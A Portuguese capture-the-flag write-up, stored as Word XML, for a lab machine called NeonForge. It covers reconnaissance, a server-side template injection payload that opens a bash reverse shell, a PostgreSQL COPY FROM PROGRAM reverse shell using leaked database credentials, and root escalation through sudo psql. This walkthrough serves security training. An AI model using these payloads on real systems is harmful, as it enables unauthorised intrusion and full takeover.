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360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.5b5c155yk6j5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heading=h.82imuf1qm0jp" w:id="1"/>
      <w:bookmarkEnd w:id="1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Introdução</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:jc w:val="center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Este write-up é referente a máquina </w:t>
      </w:r>
      <w:hyperlink r:id="rId7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NeonForge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Caso precise de suporte, favor abrir um ticket no </w:t>
      </w:r>
      <w:hyperlink r:id="rId8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canal de suporte no servidor do Discord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8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.n2cf9ee87b57" w:id="2"/>
      <w:bookmarkEnd w:id="2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Reconhecimento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0" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/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Começamos a fase reconhecimento da máquina com o comando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nmap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para verificar quais portas estão abertas.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"nmap –p- --open –min-rate 1200 &lt;machine-ip&gt; –sVC –oN nmap"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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5495544" cy="2879876"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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544" cy="2879876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partir da análise dos resultados da varredura, foi identificado que a porta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80/TCP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(HTTP) encontra-se aberta e acessível no host alvo.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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2918063"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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806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Foi realizada a enumeração de diretórios e arquivos na aplicação web através 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fuzzing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visando identificar recursos e páginas ocultas não disponíveis diretamente na interface web. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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"ffuf –u </w:t>
      </w:r>
      <w:hyperlink r:id="rId11">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://ip/FUZZ</w:t>
        </w:r>
      </w:hyperlink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-w big.txt -c –t 100 –fl 8"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5495925" cy="2970450"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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773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97045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Através da navegação manual na aplicação web e da análise dos resultados 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fuzzing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foram identificadas duas rotas principais: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/register e /login.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B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="281" w:before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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Foi possível realizar o registro de uma conta de usuário através da funcionalidade disponível na rota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000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /register</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, obtendo acesso autenticado à aplicação web.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/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5495544" cy="3857449"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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544" cy="3857449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Utilizando as credenciais criadas anteriormente, foi realizado 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login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na aplicação através da rota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/login,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estabelecendo uma sessão autenticada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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81" w:before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Durante a análise do fluxo da aplicação, foi identificado um campo de entrada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(input)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que renderiza o conteúdo fornecido pelo usuário diretamente na interface web.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0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5495544" cy="2474756"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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544" cy="2474756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Após identificar que esse input renderizava todo o conteúdo enviado diretamente na página web, foi possível avaliar a presença de vulnerabilidades como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Cross-Site Scripting (XSS)</w:t>
      </w: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 ou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Server-Side Template Injection (SSTI)</w:t>
      </w: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. Vamos começar pelo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Server-Side Template Injection (SSTI)</w:t>
      </w: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. Para isso, foi testado se a aplicação interpretava expressões matemáticas simples. Ao submeter uma multiplicação básica (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7 × 7</w:t>
      </w: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) e observar a exibição do resultado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49</w:t>
      </w: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, foi possível inferir que a entrada estava sendo interpretada e executada pelo mecanismo de template da aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000024">
      <w:pPr>
        <w:jc w:val="both"/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/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5577840" cy="2601203"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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60120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 resultado retornado pela aplicação foi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49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confirmando que a operação matemática foi processada pelo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engine de template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Este comportamento evidencia a presença da vulnerabilidade de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Server-Side Template Injection (SSTI).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000028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/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="114300" distR="114300">
            <wp:extent cx="5577840" cy="2592266"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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592266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 a confirmação da vulnerabilidade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SSTI,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possibilitou-se executar comandos no sistema operacional através da chamada de funções nativas do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PHP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tais como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system, popen, passthru e exec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A partir desse ponto, foi possível obter uma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reverse shell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 partir da exploração de uma vulnerabilidade de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Server-Side Template Injection (SSTI)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{{['/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;vpn-ip&gt;/443 0&gt;&amp;1"']|map('passthru')}}</w:t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/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3070463"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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046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Foi estabelecida uma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conexão reversa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651000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033803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jc w:val="both"/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</w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.gzb5rrotxqni" w:id="3"/>
      <w:bookmarkEnd w:id="3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Exploração - obtendo a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">user flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039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Durante a análise dos arquivos da aplicação web, foi identificado o arquivo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Database.php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responsável pela lógica de conexão e interação com o banco de dados.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70000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033803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Nesse arquivo, foi possível identificar a senha de acesso ao banco de dados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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4064000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033803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4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Foi realizada a conexão ao banco de dados utilizando as credenciais obtidas anteriormente.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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901700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033803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Caso o usuário do banco de dados possua privilégios elevados, e o comando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COPY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esteja habilitado,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torna-se possíve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l explorar essa funcionalidade para executar comandos no sistema operacional por meio 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PostgreSQL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4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Inicialmente, foi criada uma tabela no banco de dados e, em seguida, foi testada a execução de comandos por meio da funcionalidade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COPY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Para validação, foi utilizado um comando de reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047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CREATE TABLE a(output text);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049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COPY a from PROGRAM '/bin/bash -c "sh -i &gt;&amp; /dev/tcp/&lt;your-ip&gt;/443 0&gt;&amp;1"';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A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</w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="609600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033805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Dessa maneira, foi obtida uma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reverse shell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com o usuário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postgres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612900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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flag de usuários se encontra em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/var/lib/postgresql.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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660400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033803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</w:rPr>
      </w:pPr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Escalação de privilégio - obtendo a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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  <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">root flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Por meio do comando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sudo -l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foi possível identificar quais comandos e usuários podiam ser executados sem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exigência de senha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054100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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4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Foi observado que o usuário possui permissão para executar o comando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/usr/bin/psql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root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sem necessidade de senha.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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Antes de executar comandos com privilégios elevados, foi necessário configurar o banco de dados. Para isso, definiu-se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role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do usuário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root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no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PostgreSQL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 foi criada uma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(tabela)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associada a esse usuário, permitindo a autenticação e a conexão ao banco de dados com privilégios administrativos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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CREATE ROLE root WITH LOGIN SUPERUSER;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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CREATE DATABASE root OWNER root;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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257300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033803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Após essas configurações, foi possível realizar a conexão com o banco de dados como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root.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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562100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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Como os comandos eram executados com privilégios de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root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foi possível invocar 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bash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nesse mesmo contexto, resultando na obtenção de privilégios administrativos completos no sistema. Site de referencia </w:t>
      </w:r>
      <w:hyperlink r:id="rId28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https://gtfobins.github.io/gtfobins/psql/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066800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033803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flag de root se encontra no diretório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/root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6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514975" cy="552450"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="152033804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55245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headerReference r:id="rId31" w:type="default"/>
      <w:headerReference r:id="rId32" w:type="first"/>
      <w:headerReference r:id="rId33" w:type="even"/>
      <w:footerReference r:id="rId34" w:type="default"/>
      <w:footerReference r:id="rId35" w:type="first"/>
      <w:footerReference r:id="rId36" w:type="even"/>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="1440" w:top="0" w:left="1440" w:right="1440" w:header="0" w:footer="85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BM Plex Sans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ind w:left="-1276" w:right="289" w:firstLine="1276"/>
      <w:jc w:val="both"/>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:shd w:fill="9a309b" w:val="clear"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="7f7f7f"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:rtl w:val="0"/>
      </w:rPr>
      <w:t xml:space="preserve">© 2025 Hacking Club | Todos os direitos reservados </w:t>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">          </w:t>
      <w:tab/>
      <w:tab/>
      <w:tab/>
      <w:t xml:space="preserve">                          Página </w:t>
    </w:r>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000"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rPr>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:pict>
        <v:shape id="WordPictureWatermark2" style="position:absolute;width:617.75pt;height:793.5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7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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans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0">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6036q26k2cpk" w:id="4"/>
    <w:bookmarkEnd w:id="4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-866773</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>95250</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="719138" cy="232221"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="1520338052" name="image13.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image13.jpg"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="28627" l="0" r="-7644" t="36271"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="719138" cy="23222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71"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360" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
        <w:b w:val="1"/>
        <w:bCs w:val="1"/>
        <w:color w:val="000000"/>
        <w:sz w:val="32"/>
        <w:szCs w:val="3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2">
    <w:pPr>
      <w:rPr/>
    </w:pPr>
    <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
      <w:rPr/>
      <w:pict>
        <v:shape id="WordPictureWatermark1" style="position:absolute;width:617.75pt;height:793.5pt;rotation:0;z-index:-503316481;mso-position-horizontal-relative:margin;mso-position-horizontal:absolute;margin-left:-74.0pt;mso-position-vertical-relative:margin;mso-position-vertical:absolute;margin-top:-1.25pt;" alt="" type="#_x0000_t75">
          <v:imagedata cropbottom="0f" cropleft="0f" cropright="0f" croptop="0f" r:id="rId2" o:title="image17.png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-942972</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>0</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="7820025" cy="10085729"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="1520338033" name="image14.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image14.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="8816" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="7820025" cy="1008572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-334960</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="2996629"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="152033803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90550" y="2454150"/>
                        <a:ext cx="5910900" cy="265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20" w:before="480" w:line="275.00000953674316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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">Writeup - </w:t>
                          </w:r>
                          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                            <w:rPr>
                              <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
                              <w:b w:val="0"/>
                              <w:i w:val="1"/>
                              <w:smallCaps w:val="0"/>
                              <w:strike w:val="0"/>
                              <w:color w:val="ffffff"/>
                              <w:sz w:val="48"/>
                              <w:vertAlign w:val="baseline"/>
                            </w:rPr>
                            <w:t xml:space="preserve">NeonForge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-334960</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>5781358</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6667500" cy="2996629"/>
              <wp:effectExtent b="0" l="0" r="0" t="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1520338031" name="image21.png"/>
              <a:graphic>
                <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:pic>
                    <pic:nvPicPr>
                      <pic:cNvPr id="0" name="image21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67500" cy="299662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Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="705BA671"/>
    <w:rPr>
      <w:color w:val="0000ff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9.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/gtfobins/psql/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/299#" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://discord.com/channels/705946302105649153/1173705871046475796" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://ip/FUZZ" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId1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11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-italic.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-bold.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold-boldItalic.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/IBMPlexSansSemiBold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7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3.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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4.png"/><Relationship Id="rId2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ypcgXHWwQLAVrFCySKkSqVeApQ==">CgMxLjAyDmguNWI1YzE1NXlrNmo1Mg5oLjgyaW11ZjFxbTBqcDIOaC5uMmNmOWVlODdiNTcyDmguZ3piNXJyb3R4cW5pMg5oLjYwMzZxMjZrMmNwazgAciExZ053THppUHo2a2tMczNBUWMxMThGd1RqbnJlbnZZWno=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2025-10-31T11:54:00.0000000Z</dcterms:created>
</cp:coreProperties>
</file>